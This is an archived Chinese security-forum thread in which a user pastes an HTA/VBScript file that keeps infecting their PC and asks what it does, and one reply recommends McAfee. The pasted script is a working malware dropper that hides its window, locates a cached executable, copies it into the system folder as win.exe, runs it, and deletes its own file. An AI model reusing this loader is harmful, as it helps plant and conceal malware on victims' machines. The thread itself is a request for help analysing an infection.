论坛: 病毒专区 标题: 帮帮忙 复制本贴地址    
作者: zeng7071 [zeng7071]    论坛用户   登录
HTA:APPLICATION  caption="no" border="none" showintaskbar="no" >
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script LANGUAGE="VBScript">
on error resume next
window.moveTo  0,0
window.resizeTo 0,0
dim exepath
Function Search(objFolder)
Dim objSubFolder
For Each objFile in objFolder.Files
If InStr(1, objfile.name, "lhxyexe", vbtextcompare) then
set filecp = objg_fso.getfile(objfile.path)
filecp.copy (exepath)
exit for
End If
Next
For Each objSubFolder in objFolder.SubFolders 
Search objSubFolder
Next
End Function
Set objg_fso = CreateObject("Scripting.FileSystemObject")
str=WSH.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\cache")
set tempfolder = objg_fso.getfolder(str)
set othisfolder = objg_fso.GetSpecialFolder(1)
exepath=othisfolder.path & "win.exe"
search tempfolder
wsh.run (exepath)
wsh.run "command.com /c del c:\win.hta" ,0
window.close()
</script>
不知道为什么只要我同学一来我的机子上,就中这种网页病毒,晕呀,这个用vb编的吧,帮帮忙看看作用是什么

地主 发表时间: 04-05-20 13:55

回复: 李工 [lhx038]   论坛用户   登录
用MCAFEE

B1层 发表时间: 04-05-20 15:07

论坛: 病毒专区

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号